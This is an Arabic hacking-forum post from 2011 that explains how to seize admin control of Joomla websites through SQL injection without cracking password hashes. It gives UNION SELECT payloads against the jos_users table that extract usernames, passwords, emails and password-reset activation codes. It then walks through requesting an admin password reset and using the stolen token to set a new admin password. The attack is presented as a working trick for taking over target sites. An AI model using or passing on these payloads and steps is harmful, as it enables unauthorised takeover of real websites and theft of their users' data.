حقن و اختراق جوملة بدون الحاجة لفك الهاش --

حقن و اختراق جوملة بدون الحاجة لفك الهاش --


النتائج 1 إلى 10 من 12

الموضوع: حقن و اختراق جوملة بدون الحاجة لفك الهاش --

مشاهدة المواضيع

المشاركة السابقة المشاركة السابقة   المشاركة التالية المشاركة التالية
  1. #1
    هكر مجتهد الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    افتراضي حقن و اختراق جوملة بدون الحاجة لفك الهاش --

    السلام عليكم و رحمة الله تعالى و بركاته

    طبعا الكل يعرف أنو معضم ثغرات الجوملة على مواقع الحماية سيكول
    لكن تقريبا الكل يقف عند استخراج الهاش لأنو قليلا ما يمكن فكه
    في هاذا الموضوع حبيت أطرح حيلة صغيرة تساعد على دعس الهدف


    كود PHP:
    +union+select+1,concat_ws(username,0x3a,password),3+from+jos_users-- 
    طبعا هاذي الحقنة عادي كما يعرفها الكل
    و طلبنا فيها اليوزر و الباس
    --
    خلونا نطلب الإيميل بدل الباس
    كود PHP:
    +union+select+1,concat_ws(username,0x3a,email),3+from+jos_users-- 
    لحد الآن كل شيئ بسيط
    -
    -
    الخطوة اللي بعدها أنا نروح نقول لسكربت الجوملة أننا نسينا الباس
    عبر هاذا الرابط

    كود PHP:
    /index.php?option=com_user&view=reset 
    نحط بيانات المدير و نضغط ok

    رح يتم ارسال كود أكتفيشن ( activation ) لإيميل المدير

    و رح يطلب منا السكربت الكود هاذا كي نستطيع إعادة وضع الباس

    و هنا اللعبة
    الكود هاذا ينزل على قاعدة البيانات أيضا .. يعني رح نجيبه بالحقن

    فقط هكذا
    كود PHP:
    +union+select+1,concat_ws(email,0x3a,username,0x3a,activation),3+from+jos_users-- 
    الآن كود الأكتفيشن عندك
    روح اللوحة اللي وقفنا عندها بعد وضع بيانات المدير

    و أعطيه كود الأكتفيشن
    رح يقلك أعطيني الباس الجديد
    حط باس من عندك ... و اسم المدير عندنا

    مبروك عليك الموقع

    دمتم في رعاية الله
    التعديل الأخير تم بواسطة Hidden pain ; 05-18-2011 الساعة 10:37 PM


المواضيع المتشابهه

  1. مشاركات: 31
    آخر مشاركة: 09-28-2012, 11:19 PM
  2. اختراق الايميل الان بالتفصيل الممل بدون برامج- طريقة اختراق الايميل بدون برامج
    بواسطة شيطونة في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 9
    آخر مشاركة: 05-21-2012, 07:36 PM
  3. موقع عربي لفك المواقع المحجوبة بدون برامج وفك تشفير الهاش بدون برامج
    بواسطة pulldozer في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 58
    آخر مشاركة: 04-08-2012, 12:18 AM
  4. اختراق الاميل بدون برامج
    بواسطة ابو رحيّم في المنتدى قسم المواضيع المخالفة والمكررة
    مشاركات: 10
    آخر مشاركة: 11-17-2010, 08:46 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •